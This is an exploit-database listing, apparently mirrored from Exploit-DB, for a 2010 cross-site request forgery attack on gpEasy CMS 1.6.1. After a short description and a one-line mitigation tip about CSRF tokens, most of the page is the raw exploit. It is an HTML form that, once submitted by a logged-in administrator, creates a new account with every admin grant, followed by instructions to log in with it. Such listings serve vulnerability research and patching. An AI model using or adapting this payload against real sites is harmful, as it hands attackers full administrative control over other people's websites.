header-logo
Suggest Exploit
vendor:
gpeasy
by:
Giuseppe 'giudinvx' D'Inverno
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: gpeasy
Affected Version From: 1.6.1
Affected Version To: 1.6.1
Patch Exists: NO
Related CWE: N/A
CPE: a:gpeasy:gpeasy
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit

This exploit allows an attacker to add an admin user to the gpEasy CMS by sending a maliciously crafted request to the vulnerable application. The attacker can specify the username, password, and email address of the new admin user. The exploit code provided creates a form with the necessary fields and submits it to the vulnerable application.

Mitigation:

Implementing a CSRF token in the application can help prevent this type of attack.
Source

Exploit-DB raw data:

=============================================
gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit
=============================================

Author : Giuseppe 'giudinvx' D'Inverno
Email : <giudinvx[at]gmail[dot]com>
Date : 04-29-2010
Site     : http://www.giudinvx.altervista.org/
Location : Naples, Italy

--------------------------------------------------------
Application Info
Site   : http://www.gpeasy.com/
Version: 1.6.1
--------------------------------------------------------

==============[[ -Exploit Code- ]]==============

<html>
<form method="post" action="[patth]/index.php/Admin_Users">
<input type="text" value="xxx" name="username"><br/>
<input type="password" value="xxx" name="password"><br/>
<input type="password" value="xxx" name="password1"><br/>
<input type="text" value="xxx" name="email"><br/>
<input value="Admin_Menu" type="hidden" name="grant[]">
<input value="Admin_Uploaded" type="hidden" name="grant[]">
<input value="Admin_Extra" type="hidden" name="grant[]">
<input value="Admin_Theme" type="hidden" name="grant[]">
<input value="Admin_Users" type="hidden" name="grant[]">
<input value="Admin_Configuration" type="hidden" name="grant[]">
<input value="Admin_Trash" type="hidden" name="grant[]">
<input value="Admin_Uninstall" type="hidden" name="grant[]">
<input value="Admin_Addons" type="hidden" name="grant[]">
<input value="Admin_New" type="hidden" name="grant[]">
<input value="Admin_Theme_Content" type="hidden" name="grant[]">
<input type="hidden" value="newuser" name="cmd">
<input type="submit" value="Continue" name="aaa" class="submit">
</form>
</html>

# Now you have an Admin user with name: xxx and password: xxx, just login
page [path]/index.php/Admin

Navigation

Suggest Exploit

Services By CQR